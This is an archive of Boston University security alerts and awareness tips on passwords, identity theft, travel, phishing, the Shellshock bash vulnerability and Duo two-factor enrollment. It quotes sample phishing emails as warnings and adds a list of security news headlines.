  • Best: The strongest passwords are created by password managers — software that generates and keeps track of complex and unique passwords for all of your accounts. All you need to remember is one complex password or passphrase to access your password manager. With a password manager, you can look up passwords when you need them, copy and paste from the vault, or use functionality within the software to log you in automatically. Best practice is to add two-step verification to your password manager account. Keep reading!
  • Step it up! When you use two-step verification (a.k.a., two-factor authentication or login approval), a stolen password doesn’t result in a stolen account. Anytime your account is logged into from a new device, you receive an authorization check on your smartphone or other registered device. Without that second piece, a password thief can’t get into your account. It’s the single best way to protect your account from cybercriminals.

April 2017: Don’t Be Fooled! Protect Yourself and Your Identity

According to the US Department of Justice, more than 17 million Americans were victims of identity theft in 2014. EDUCAUSE research shows that 21 percent of respondents to the annual ECAR student study have had an online account hacked, and 14 percent have had a computer, tablet, or smartphone stolen. Online fraud is an ongoing risk. The following tips can help you prevent identity theft.

  • Read your credit card, bank, and pay statements carefully each month. Look for unusual or unexpected transactions. Remember also to review recurring bill charges and other important personal account information.
  • Review your health insurance plan statements and claims. Look for unusual or unexpected transactions.
  • Shred it! Shred any documents with personal, financial, or medical information before you throw them away.’
  • Take advantage of free annual credit report. In the US, the three major credit reporting agencies provide a free credit report once a year upon request.
  • If a request for your personal info doesn’t feel right, do not feel obligated to respond! Legitimate companies won’t ask for personal information such as your social security number, password, or account number in a pop-up ad, e-mail, text, or unsolicited phone call.
  • Limit the personal information you share on social media. Also, check your privacy settings every time you update an application or operating system (or at least every few months).
  • Put a password on it. Protect your online accounts and mobile devices with strong, unique passwords or passphrases.
  • Limit use of public Wi-Fi. Be careful when using free Wi-Fi, which may not be secure. Consider waiting to access online banking information or other sensitive accounts until you are at home.
  • Secure your devices. Encrypt your hard drive, use a VPN, and ensure that your systems, apps, antivirus software, and plug-ins are up-to-date.

If you become a victim of identity theft:

  • File a report with the US Federal Trade Commission at IdentityTheft.gov.
  • Use the identity theft report to file a police report. Make sure you keep a copy of both reports in a safe place.
  • Flag your credit reports by contacting the fraud departments of any one of the three major credit bureaus: Equifax (800-525-6285), Experian (888-397-3742), or TransUnion (800-680-7289).

March 2017: Security Tips for Traveling at Home and Abroad

We all like to travel with our mobile devices (smartphones, laptops, or tablets) — whether it’s to the coffee shop around the corner or to a café in Paris. These devices make it easy for us to stay connected while on the go, but they can also store a lot of information — including contacts, photos, videos, location, and other personal and financial data — about ourselves and our friends and family. Following are some ways to protect yourself and others.

Before you go:

  • If possible, do not take your work or personal devices with you on international trips. If you do, remove or encrypt any confidential data.
  • For international travel, consider using temporary devices, such as an inexpensive laptop and a prepaid cell phone purchased specifically for travel. (For business travel, your employer may have specific policies about device use and traveling abroad.)
  • Install a device finder or manager on your mobile device in case it is lost or stolen. Make sure
    it has remote wipe capabilities and that you know how to do a remote wipe.
  • Ensure that any device with an operating system and software is fully patched and up-to-date with security software.
  • Makes copies of your travel documents and any credit cards you’re taking with you. Leave the copies with a trusted friend, in case the items are lost or stolen.
  • Keep prying eyes out! Use strong passwords, passcodes, or smart-phone touch ID to lock and protect your devices.
  • Avoid posting social media announcements about your travel plans; such announcements make you an easy target for thieves. Wait until you’re home to post your photos or share details about your trip.

While you’re there:

  • Physically protect yourself, your devices, and any identification documents (especially your passport).
  • Don’t use an ATM unless you have no other option; instead, work with a teller inside the bank. If you must use an ATM, only do so during daylight hours and ask a friend to watch your back. Also check the ATM for any skimming devices, and use your hand to cover the number pad as you enter your PIN.
  • It’s hard to resist sharing photos or telling friends and family about your adventures, but it’s best to wait to post about your trip on social media until you return home.
  • Never use the computers available in public areas, hotel business centers, or cyber cafés since they may be loaded with keyloggers and malware. If you use a device belonging to other travelers, colleagues, or friends, do not log in to e-mail or any sensitive accounts.
  • Be careful when using public wireless networks or Wi-Fi hotspots; they’re not secure, so anyone could potentially see what you’re doing on your computer or mobile device while you’re connected.
  • Disable Wi-Fi and Bluetooth when not in use. Some stores and other locations search for devices with Wi-Fi or Bluetooth enabled to track your movements when you’re within range.
  • Keep your devices with you at all times during your travels. Do not assume they will be safe in your hotel room or in a hotel safe.

When you return:

  • Change any and all passwords you may have used abroad.
  • Run full antivirus scans on your devices.
  • If you used a credit card while traveling, check your monthly statements for any discrepancies for at least one year after you return.
  • If you downloaded any apps specifically for your trip and no longer need them, be sure to delete those apps and the associated data.
  • Post all of your photos on social media and enjoy reliving the experience!

Security Tips for Smarter Travel


Don’t be duped by phishing scams

Cybercriminals know the best strategies for gaining access to your institution’s sensitive data. In most cases, it doesn’t involve them rappelling from a ceiling’s skylight and deftly avoiding a laser detection system to hack into your servers; instead, they simply manipulate a community member.

According to IBM’s 2014 Cyber Security Intelligence Index, human error is a factor in 95 percent of security incidents. Following are a few ways to identify various types of social engineering attacks and their telltale signs.

  • Phishing isn’t relegated to just e-mail! Cybercriminals will also launch phishing attacks through phone calls, text messages, or other online messaging applications. Don’t know the sender or caller? Seem too good to be true? It’s probably a phishing attack.
  • Know the signs. Does the e-mail contain a vague salutation, spelling or grammatical errors, an urgent request, and/or an offer that seems impossibly good? Click that delete button.
  • Verify the sender. Check the sender’s e-mail address to make sure it’s legitimate. If it appears that your institution’s help desk is asking you to click on a link to increase your mailbox quota, but the sender is “UniversityHelpDesk@yahoo.com,” it’s a phishing message.
  • Don’t be duped by aesthetics. Phishing e-mails often contain convincing logos, links to actual company websites, legitimate phone numbers, and e-mail signatures of actual employees. However, if the message is urging you to take action — especially action such as sending sensitive information, clicking on a link, or downloading an attachment — exercise caution and look for other telltale signs of phishing attacks. Don’t hesitate to contact the company directly; they can verify legitimacy and may not even be aware that their name is being used for fraud.
  • Never, ever share your password. Did we say never? Yup, we mean never. Your password is the key to your identity, your data, and your classmates’ and colleagues’ data. It is for your eyes only. Your institution’s help desk or IT department will never ask you for your password.
  • Avoid opening links and attachments from unknown senders. Get into the habit of typing known URLs into your browser. Don’t open attachments unless you’re expecting a file from someone. Give them a call if you’re suspicious.
  • When you’re not sure, call to verify. Let’s say you receive an e-mail claiming to be from someone you know — a friend, colleague, or even the president of your college or university. Cybercriminals often spoof addresses to convince you, then request that you perform an action such as transfer funds or provide sensitive information. If something seems off about the e-mail, call them at a known number listed in your institution’s directory to confirm the request.
  • Don’t talk to strangers! Receive a call from someone you don’t know? Are they asking you to provide information or making odd requests? Hang up the phone and report it to the help desk.
  • Don’t be tempted by abandoned flash drives. Cybercriminals may leave flash drives lying around for victims to pick up and insert, thereby unknowingly installing malware on their computers. You might be tempted to insert a flash drive only to find out the rightful owner, but be wary — it could be a trap.
  • See someone suspicious? Say something. If you notice someone suspicious walking around or “tailgating” someone else, especially in an off-limits area, call campus safety.

Data Privacy Day – January 28, 2017

January 28th is the international Data Privacy Day. Learn how to change your privacy and security settings more about safeguarding your digital presence here.


Action Required before May 15 – Windows 2003 Server support ending

May 19th, 2015

The date for the end of support for Windows 2003 servers is fast approaching—only 3 months away.  It is crucial that we have these systems remediated before the July 14 deadline.  When Microsoft stopped supporting XP, the bad guys stock-piled all their zero-day exploits for an entire year beforehand, just waiting for that day when they could compromise any XP machine and not have to worry about having a security patch kick them out.  You can be sure they are doing the same for 2003.

I’m hoping that you have identified any of your servers still using Windows 2003, and have already begun to remediate them.

Here is a link to Microsoft’s information regarding end of support including Microsoft migration options:  http://www.microsoft.com/en-us/server-cloud/products/windows-server-2003/.

From a security perspective, here are some of the remediation options we recommend:

  • If the server is no longer needed, or after the server has been remediated:

o   Please SEND an email to Systems Administration (ist-sa@bu.edu) with the name of the server and if it is currently a physical or virtual machine.

o   Include instructions for WHEN it can be powered down, disabled in AD, and deleted (VM).

  • If currently a physical machine:

o   Request a new VM with a fresh install of Windows 2012 R2.

o   Upgrade to a supported OS on the same machine.

o  Do a fresh install of a supported OS on a new physical machine.

  • If currently a virtual machine:

o   Update the software to a supported version on the same VM.

o   Request a new VM and do a fresh install of a supported OS.

If you are requesting a new VM or additional resources for an existing VM, Systems Administrationneeds to know your requirements (CPU, memory, disk) immediately.  I strongly encourage you to reach out as soon as possible as the end of support is quickly approaching.

As you plan to remediate each of your servers, please keep IS&T informed by sending your remediation plans to Systems Administration.   If you have any questions or concerns about remediation options, please contact Gerard Shockley directly.


 

Tax Fraud Advisory

April 14th, 2015

During this 2015 tax season, taxpayers should prepare for heightened risks and be vigilant to tax fraud.

Read REN-ISAC’s advisory


 

Facebook is Changing Their Privacy Policy

December 19th, 2014

Facebook is changing their privacy policy allowing themselves unrestricted access to share your location information with advertisers (details:https://www.facebook.com/about/privacy/update). For those of you that are privacy-minded, there are a couple of things you can do:

[1] Review the Facebook Privacy basics (https://www.facebook.com/settings/?tab=privacy). There are some good things here that you should know and decide about. In fact, go through everything in the Settings section and update it to your preference. Note however that you have no control of what information that Facebook shares with advertisers, so we have to take things out of their hand to the extent we can:

[2] We can applaud advertising companies that are willing to offer and respect our choices around security and privacy. These companies have joined an opt-out program allowing you to ask not to be tracked. The link for it is http://www.aboutads.info/choices/ and is below. This works by setting a cookie on your system with your do-not-track preference, so you will need to allow a third party cookie to be set for this site. Also, you will need to run this on each browser and each device you use.

But you can be guaranteed that many (most?) advertising companies will continue to disregard our choices and preferences, so there is a second thing you can do which I think is particularly important on smartphones:

[3] Disable Location Services for Facebook and your web browser.
● On the iPhone, it is Settings > Privacy > Location Services > then set Facebook and Safari to “Never”
● Androids are all a little different, so you will need to look it up for your model phone.


 

Boston University Receives Security Innovation Award from CSO Magazine

October 31st, 2014

IS&T to be Recognized at the CSO50 Security Awards Conference

Boston, MA – October 2, 2014 – Boston University’s Information Services and Technology Department(IS&T) has been named a recipient of a 2015 CSO50 Award from IDG’s CSO Magazine (International Data Group’s Chief Security Officer Magazine). This prestigious honor is bestowed upon a select group of organizations that have demonstrated how their security initiatives and innovations have created outstanding business value and thought leadership for their companies and the information security industry.

Quinn Shamblin, BU Information Security Officer, explains the goals of the project, “From researchers working with protected health information to University administration working with financial numbers and business strategy to the business offices dealing with credit card transactions—many organizations and groups within a University have need for secure servers on which to conduct business using information protected by State and Federal law and regulation.  In multi-tenant environments without purpose-crafted security controls, information and resources are often accessed by more than one tenant and regulated information may be at risk through shared memory attacks and other mechanisms.”

“BU Information Security and IS&T Systems Engineering worked together to create the ‘Premium Secure VM’ service, which leverages VMware and other tools to provide the security required to handle our most sensitive information in a virtual environment.  This allows us to move away from standalone physical servers for these kinds of workloads, taking advantage of the economies of scale, natural system lifecycle management, and the reduced environmental impact offered by a virtual hosted server environment.”

“The architecture was a result of a close collaboration between Systems Engineering staff and Senior Information Security Administrator Tammy Pruneau,” explains Josie DeBaere, the Director of Systems Engineering. “Based on Tammy’s requirements, Systems Architects and Engineers designed and then deployed a new virtual environment that uses advanced components of the VMware vCloud Suite to provide the additional controls required for compliance.”

The solution was designed to meet the requirements of a wide variety of sensitive information:  HIPAA, GLBA Financial, PCI, PII, ePHI, and data protected by Massachusetts General Law.  “My focus was working through the myriad of laws and regulations to define one cohesive superset of security requirements.  I leveraged that research and my experience with a precursor to vSphere called ConfigureSoft to work with Engineering on the project, says Tammy.

Nik Conwell, Manager of Systems Engineering reports significant benefits: he projects savings of $1000 on acquisition costs and $1000/year on power per system brought into the environment. In 6 months of operation, 48 systems were virtualized and the Server Administrators continue to bring new servers into the environment.

“Tracy Schroeder, VP of Information Services &Technology (IS&T), provided very visible support for this effort, something we deeply appreciate,” says Shamblin,

“For the third year in a row, outstanding organizations demonstrating innovation, creativity and understanding of business value in security were chosen from a large pool of submissions.” said Joan Goodchild, editor, CSO. “We congratulate this year’s CSO50 winners and applaud them for setting the bar high for security’s role in providing value and ROI in business.”

In recognizing a select group of organizations for security projects and initiatives that demonstrate outstanding business value, the CSO50 Awards are scored according to a uniform set of criteria by a panel of judges that includes security leaders, industry experts, and academics.

Quinn, Tammy and Nik will accept the award at the CSO50 Security Confab + Awards conferenceheld on February 23-25, 2015 at the Omni Amelia Island Plantation, Amelia Island, Florida.

About the CSO50 Awards

Launched in 2013, the CSO50 Awards recognizes 50 organizations for security projects and initiatives that demonstrate outstanding business value and thought leadership. The CSO50 Awards are scored according to a uniform set of criteria by a panel of judges that includes security leaders, industry experts, and academics. Awards will be presented at the CSO50 Security Confab + Awardsconference.

About CSO

CSO (Chief Security Officer) is the premier content and community resource for security decision-makers who lead “business risk management” efforts within their organization.  For more than a decade, CSO’s award-winning website (CSOonline.com), executive conferences, strategic marketing services and research have equipped security decision-makers to mitigate both IT and corporate/physical risk for their organizations and provided opportunities for security vendors looking to reach this audience. To assist CSOs in educating their organizations’ employees on corporate and personal security practices, CSO also produces the quarterly newsletter Security Smart. CSO is published by IDG Enterprise, a subsidiary of International Data Group (IDG), the world’s leading media, events and research company. Company information is available at www.idgenterprise.com.

About Boston University

Boston University (BU) is the fourth-largest private university in the U.S., with over 33,000 undergraduate and graduate students from more than 130 countries, nearly 10,000 faculty and staff, 16 schools and colleges, and 250 fields of study.  It is an internationally recognized institution of higher education and research and has one of the largest populations of international students of any U.S. university.  In 2013, BU was ranked 41st in the nation by U.S. News & World Reports and 50th in the world (Times of London, Higher Education).

Information Services and Technology, headed by VP Tracy Schroeder, is Boston University’s central IT organization and includes BU Information Security, headed by Executive Director & BU Information Security Officer Quinn R. Shamblin, and Systems Engineering, headed by Director Josie DeBaere.


 

Beginning Tuesday, October 14, all Boston University employees will be automatically enrolled in Duo Security for the BUworks Central Portal.

October 9th, 2014

Beginning Tuesday, October 14, all Boston University employees will be automatically enrolled in Duo Security for the BUworks Central Portal.

Information Services & Technology now provides high-security protection for your pay statements and benefits information on the BUworks Central Portal!

On Tuesday, October 14, all employees will be automatically enrolled in Duo Security for the BUworks Central Portal at www.bu.edu/buworkscentral. Users will be prompted to enroll a device in Duo the first time they attempt to log in on or after October 14.

This new, high-security login process asks individuals logging in to confirm their identity using a smartphone app, via text message to a device, via automated calls to a mobile or landline phone, or using a secured kiosk (for certain staff).

You can learn more about the new login process and find setup instructions for Duo Security atwww.bu.edu/tech/duo. For people who log in to BUworks frequently, we recommend the option to “remember this device for 30 days” which reduces the number of times you’ll need to confirm your identity when using the same computer and browser.

If you have any questions or concerns, please contact the IT Help Center online, via email atithelp@bu.edu, or by phone at (617)353-HELP (4357).

Boston University Information Services & Technology
IT Help Center
ithelp@bu.edu
617-353-HELP(4357)
www.bu.edu/tech


 

Using Bash? Learn more about the ‘Shellshock’ vulnerability

September 26th, 2014

There has been a lot published about the “Shellshock” vulnerability discovered on Monday by Stephane Chazelas.  Shellshock allows any user on a system to gain access to “root” and therefore be able to execute any command and look at any file.  It grants very high levels of access and is very easy to execute.

This is a serious vulnerability that may affect Mac OS if you have made changes from the default settings; unfortunately Apple has not yet provided details as to what changes might make a Mac vulnerable.  If you have not changed your Mac from its default settings, you are likely not vulnerable, but regardless, accept the update when Apple releases it.

Shellshock also affects many Linux/Unix systems.  System administrators throughout BU are already working to update BU systems to protect against this issue, but those of you that privately run or administer any Linux/Unix system that uses the BASH shell should read up on CVE-2014-6271 and patch your systems immediately.

For more details see: http://www.bu.edu/infosec/2014/09/26/gnu-bourne-again-shell-bash-shellshock-vulnerability/


 

GNU Bourne Again Shell (Bash) ‘Shellshock’ Vulnerability

September 26th, 2014 in Security Alerts for BU

National Cyber Awareness System:

TA14-268A: GNU Bourne Again Shell (Bash) ‘Shellshock’ Vulnerability (CVE-2014-6271,CVE-2014-7169)

09/25/2014 12:56 PM EDT

Original release date: September 25, 2014

Systems Affected

  • GNU Bash through 4.3.
  • Linux, BSD, and UNIX distributions including but not limited to:
    • CentOS 5 through 7
    • Debian
    • Mac OS X
    • Red Hat Enterprise Linux 4 through 7
    • Ubuntu 10.04 LTS, 12.04 LTS, and 14.04 LTS

Overview

A critical vulnerability has been reported in the GNU Bourne Again Shell (Bash), the common command-line shell used in most Linux/UNIX operating systems and Apple’s Mac OS X. The flaw could allow an attacker to remotely execute shell commands by attaching malicious code in environment variables used by the operating system [1]. The United States Department of Homeland Security (DHS) is releasing this Technical Alert to provide further information about the GNU Bash vulnerability.

Description

GNU Bash versions 1.14 through 4.3 contain a flaw that processes commands placed after function definitions in the added environment variable, allowing remote attackers to execute arbitrary code via a crafted environment which enables network-based exploitation. [2, 3]

Critical instances where the vulnerability may be exposed include: [4, 5]

  • Apache HTTP Server using mod_cgi or mod_cgid scripts either written in bash, or spawn subshells.
  • Override or Bypass ForceCommand feature in OpenSSH sshd and limited protection for some Git and Subversion deployments used to restrict shells and allows arbitrary command execution capabilities.
  • Allow arbitrary commands to run on a DHCP client machine, various Daemons and SUID/privileged programs.
  • Exploit servers and other Unix and Linux devices via Web requests, secure shell, telnet sessions, or other programs that use Bash to execute scripts.

Impact

This vulnerability is classified by industry standards as “High” impact with CVSS Impact Subscore 10 and “Low” on complexity, which means it takes little skill to perform. This flaw allows attackers to provide specially crafted environment variables containing arbitrary commands that can be executed on vulnerable systems. It is especially dangerous because of the prevalent use of the Bash shell and its ability to be called by an application in numerous ways.

Solution

Patches have been released to fix this vulnerability by major Linux vendors for affected versions. Solutions for CVE-2014-6271 do not completely resolve the vulnerability. It is advised to install existing patches and pay attention for updated patches to address CVE-2014-7169.

Many UNIX-like operating systems, including Linux distributions, BSD variants, and Apple Mac OS X include Bash and are likely to be affected. Contact your vendor for updated information. A list of vendors can be found in CERT Vulnerability Note VU#252743 [6].

US-CERT recommends system administrators review the vendor patches and the NIST Vulnerability Summary for CVE-2014-7169, to mitigate damage caused by the exploit.

References


Scams Targeting University Employees and Students

July 16th, 2014 in Security Alerts for BU

The bad guys are at it again!  Universities across the nation have been working to tighten security around employee pay and the bad guys are trying to get around the new protections.  If you see a message like the one below, it is a scam.

They will ask you directly for your bank account numbers to try to bypass the security we have put in place to keep your information safe.  If you have already responded to a message like this, you can report this cyber crime directly to the FBI at www.ic3.gov

Hello,

The University is having a salary increment program again this year with an average of 2.5%.
The Human Resources department evaluated you for a raise on your next paycheck.
Click below to confirm and access your salary revision documents:

…link removed….to access the documents

Sincerely,

Human Resources


BU is Currently Experiencing a Flood of Phishing Emails

May 29th, 2014 in Security Alerts for BU

Boston University is currently seeing a flood of fishing messages pretending to be from BU.  These messages are scams.  The link to sends you to a web site that is not BU.EDU (you can see this for yourself if you hover your mouse over the link, or, if you’re on a smart phone, click and hold until the link is displayed).

 

If you see this message, delete it.  Did not click the link and do not login.

 

————————————————————–
Sent: Thursday, May 29, 2014 7:57 AM
Subject: HELP-DESK Boston University

 

(IMAP) Server – requires Increase, Mailbox has exceeded its storage limit.

Click on Faculty and Staff Portal to increase

Mailbox SEND/RECEIVE Functions will be disabled if account increase is not completed.

Copyright © 2014 Staff and Faculty Mailbox Portal.

 


Changes to the BUworks Login Screen

May 29th, 2014 in Security Alerts for BU

Information Services & Technology is piloting a new high-security login process for viewing and editing employee information, including pay statements and benefits on the BUworks Central Portal.

On June 10th, a new login service will be released to support this pilot program. This new service will also improve the capability and reliability of Boston University web authentication.

When we release the new service on June 10th, the login screen you’re used to seeing atwww.bu.edu/buworkscentral/ will change slightly. In addition, Web Login-secured applications (e.g., The Links), including those linked from BUworks Central, will require a separate login.

The high-security login pilot will be followed by a voluntary opt-in for all BU community members that log in to BUworks beginning in July. You can learn more about the new higher-security login process at www.bu.edu/tech/duo/.

If you have any questions or concerns, please contact the IT Help Center online, via email at ithelp@bu.edu, or by phone at (617)353-HELP (4357).


Microsoft releases security patch for Internet explorer. Update now.

May 1st, 2014 in Security Alerts for BU

Today Microsoft has released an out-of-band security update to address the issue affecting Internet Explorer (IE) that was first discussed in Microsoft Security Advisory 2963983.  (Details below).

The new security update MS14-021 – Security Update for Internet Explorer (2965111) is fully tested and ready for release for all affected versions of the browser.

By now you may have heard that US-CERT and an number of other large security organizations are recommending people stop using IE for a while until a security issue is resolved.

http://www.smh.com.au/it-pro/security-it/australia-us-uk-advise-avoiding-microsoft-internet-explorer-until-bug-fixed-20140428-zr11i.html

Security issues are discovered on a daily basis and, while we always need to act with an abundance of care and caution, we also need to really think through how we respond to events such as this.

The issue in the article above is serious, but it is also something that requires a user to go to an infected web page in order to exploit.  If the person is going to web pages that they always go to – web pages associated with their normal business and life – the risk should not be too great.  As a practical matter, there are many web sites that don’t work properly on anything other than Internet Explorer, so the advice of “stop using Internet Explorer” really has little practical value for many people.  Rather, we should look to provide guidance on how to reduce the risk generally speaking and particularly until the patch for this is released.

A counterpoint to the above story is a recent report by an independent lab, NSS, that showed IE as being far and away the most effect at blocking tested malware at over 99%, with Chrome at 70% and Firefox and Safari a dismal 4%.  But these results are always changing as the focus of the bad guys change to take advantage of different things, to keep people guessing.  So this new issues hits and for the moment IE is in the spotlight.

One thing that you definitely need to do is stop using XP.  It is no longer under support, more and more exploits will be hitting the wild from now on and no one will be releasing fixes.  Once you machine is breached, it will stay breached, and that will happen very quickly.

However there are several things that you can do to protect yourself again this particular issue and many others and still continue to use IE.  Microsoft outlines a few of those here, but to summarize, the article suggests setting IE up in “Enhanced Security Configuration”—something that is good security practice anyway.   These are the general steps:

  1. Go to IE > Internet Options
  2. Click on the Security Tab
  3. Ensure that the following levels are set for each zone:
  • For the Internet zone, the security level is set to High.  This will mean that any site you browse to that is not in your trusted sites category, will be prohibited from running scripts and dynamic content.  This will protect you from a large number of threats out there, but it also means that most of the sites you normally use will not work correctly until you put them into trusted sites
  • For the Trusted sites zone, the security level is set to Medium, which allows dynamic content and normal operation of most Internet sites.
  • For the Local intranet zone, the security level is set to Medium-low, which allows your user credentials (user name and password) to be sent automatically to sites and applications that need them.
  • For the Restricted sites zone, the security level is set to High.
  1. You will then need to add the sites you normally use and trust to the Trusted sites zones so that they will work properly.  This takes some time to set up the first time, but once you have done so, you will be much more secure moving in to the future.

Quinn R Shamblin                                                            .

Executive Director of Information Security, Boston University


Direct Deposit Reactivated on ESS

April 23rd, 2014 in Security Alerts for BU

Dear Colleagues,

Boston University is committed to securing the personal information of our faculty and staff. In light of the recent Phishing events the Direct Deposit banking information on Employee Self Service (ESS) was disabled as a security precaution. A working group was formed and has been working diligently to develop more robust security measures to safeguard our employee’s personal banking information.

We are pleased to announce starting February 19, 2014 the Direct Deposit Link on ESS is once again available for use. Enhancements have been made to the Direct Deposit application by adding Banking validation checks. You will now be asked for your Current MAIN Bank account information when making banking changes to your existing account. Newly hired employees may skip this field.

The working group is also looking at developing more advanced and long term security solutions for the SAP Employee Self Service portal. We will have more information to share with soon on these future improvements.
Thank you for your continued support. If you have any problems or questions related to Direct Deposit, please feel free to contact the Payroll Office at 617-353-2270 or e-mail bupay@bu.edu.

Sincerely,
Diane Tucker
Chief Human Resources Officer
Gillian Emmons
University Comptroller


Phishing continues

April 23rd, 2014 in Security Alerts for BU

The phishing scammers are at it again.

The phishing scammers are trying again. We have received several reports this morning of the message below being received by members of our community. This is the kind of phishing message we believe was responsible for the direct deposit problem we reported earlier this month, and the scammers are trying to use the fact that they were successful last time to continue and extend their crime. This message claims to be from security and talks protecting you from the evils of phishing.

If you inadvertently clicked on this messages already, please contact the IT Help center for assistance with resetting your password.

The way that you can really tell that this message is a fake—is that it claims to be from BU, it even uses our logos, but it is sending you to a link that is not a bu.edu link.

A real BU link will always have “ .bu.edu/ ” in it.
There is always a dot before bu and always a slash after edu

These are examples of legitimate URLs:

You can see in the message below, that they are trying to look like a BU URL by including “bu.edu”, but it is not preceded by a dot as shown above. A small, but crucial difference.

Jan14phish

Another few things to look for:

  • If you are prompted to Web Login, make sure it is the authentic BU Web Login page which begins with https://weblogin.bu.edu/something
  • And remember that BU will NEVER ask you for your password or ask you to “verify” it; nor would any other legitimate business or institution. It is important that you safeguard your passwords and never give them to anyone.

For more good ways to detect phishing, go to: http://www.bu.edu/infosec/howtos/how-to-detect-phishing/

Additional information on phishing is provided by IS&T at http://www.bu.edu/tech/phishing

 

Making your spam/phishing filter more effective

Mail that is clearly spam is filtered for you, automatically. However, one person’s spam might be another person’s research project, so other messages are simply tagged as suspicious and then allowed to go through. You can decide how to handle suspicious mail that does get through, following the tips for Managing Spam provided by IS&T at http://www.bu.edu/tech/comm/email/unwanted-email/spam/

 

 

Reporting Phishing

If you see a phishing message, please send it and full headers to abuse@bu.edu

For details on how to do this, see: http://www.bu.edu/tech/comm/email/unwanted-email/report-abuse/

 

Thank you all for your attention and help in fighting this problem.

Quinn R Shamblin .

Executive Director of Information Security, Boston University


 

The Phishing continues

 The phishing scammers are trying again.  We have received several reports this morning of the message below being received by members of our community.  This is the kind of phishing message we believe was responsible for the direct deposit problem we reported earlier this month, and the scammers are trying to use the fact that they were successful last time to continue and extend their crime.  This message claims to be from security and talks protecting you from the evils of phishing.

 


BU Security Tips: Keeping Safe & Secure for the Holidays and 2014

 In this digital age, we rely on our computers and devices for so many aspects of our lives that the need to be proactive and vigilant to protect against cyber threats has never been greater. Included in this article are several best practice strategies for strengthening defenses!


Adobe Leaked Passwords – if you haven’t changed your password, please do so now

If you have ever created an account with Adobe to download or register any of their products, please change your Adobe password immediately and be sure to change the password of any account that shares this password.   To change your BU password, go to:  http://www.bu.edu/tech/accounts/kerberos/reset/

Adobe was recently the victim of a hack [1] in which  of over 153 million accounts, passwords and password hints were exposed. BU InfoSec has analyzed the information that was made public to find risks to our users and found that over 9000 of these accounts belong to users who signed up with Boston University email addresses.

To keep yourself safe in the future, do not use the same password for multiple accounts and use a password manager [2] to store each unique password and keep them all safe.

If you need any assistance or are concerned about the security of your BU Kerberos account, contact the BU Help Desk at (617) 353-HELP or ithelp@bu.edu.

[1] http://blogs.adobe.com/conversations/2013/10/important-customer-security-announcement.html
[2] http://www.bu.edu/infosec/howtos/password-management/

Cryptolocker: How to avoid getting infected and what to do if you are

ComputerWorld: There’s a new piece of ransomware circling the internet – Cryptolocker comes in the door through social engineering. Usually the virus payload hides in an attachment to a phishing message, one purporting to be from a business copier like Xerox that is delivering a PDF of a scanned image, from a major delivery service like UPS orFedEx offering tracking information or from a bank letter confirming a wire or money transfer.

Here’s how to protect yourself from this threat

If you believe you’ve been infected, visit this link for help: http://www.bleepingcomputer.com/virus-removal/cryptolocker-ransomware-information

Android banking malware with a twist in the delivery

Naked Security: “…Mobile malware that reads your SMSes before you do can steal important data such as the two-factor authentication (2FA) codes sent by your email provider or your bank, giving cybercriminals a way into your account despite the extra layer of protection in place.”

FBI has arrested five people, two of whom ran websites, on suspicion of offering or using hacking on demand services.  FBI said that it has picked up two website operators and three users in an international operation involving the cooperation of Romanian, Indian and Chinese authorities.  The five domestic suspects from Arkansas, California, Michigan and New York have been charged with obtaining unauthorized access to email accounts.

Craft store Michaels faces second credit card compromise in 3 years

Naked Security: Michaels, the largest arts and crafts store in North America, has acknowledged it may be the latest victim of malware targeting point-of-sale (PoS or cash register) computers.

Feds to Charge Alleged SpyEye Trojan Author

Krebs On Security: Federal authorities in Atlanta today are expected to announce the arrest and charging of a 24-year-old Russian man who allegedly created and maintained the SpyEye Trojan, a sophisticated botnet creation kit that has been implicated in a number of costly online banking thefts against businesses and consumers.

Target admits “there was malware on our point-of-sale registers”

Naked Security: “The Target data breach story has turned into a bit of a bus: it’s big, has lots of momentum, and three just came along at once.”

Java-based malware driving DDoS botnet infects Windows, Mac, Linux devices

Ars Technica: “Multi-platform threat exploits old Java flaw, gains persistence.”

Deconstructing the $9.84 Credit Card Hustle

Krebs On Security: “Over the holidays, I heard from a number of readers who were seeing strange, unauthorized charges showing up on their credit and debit cards for $9.84. Many wondered whether this was the result of the Target breach; I suppose I asked for this, having repeatedly advised readers to keep a close eye on their bank statements for bogus transactions. It’s still not clear how consumers’ card numbers are being stolen here, but the fraud appears to stem from an elaborate network of affiliate schemes that stretch from Cyprus to India and the United Kingdom.”

FBI warns of crimewave hitting cash registers

Naked Security: “The US Federal Bureau of Investigations (FBI) has warned retailers to harden their defences against cyber-heists – particularly those that latch onto credit card details from shoppers, as apparently happened to Target”

Stop Asking Me for My Email Address

New York Times: “I explained, as I have a hundred times before, that I’m a paranoid security reporter who makes it a general rule of thumb not to hand out information unnecessarily.”

Apple.com does more to protect your password, study of top 100 sites finds

Ars Technica: Which sites allow “123456”? Study names/shames the best/worst password policies.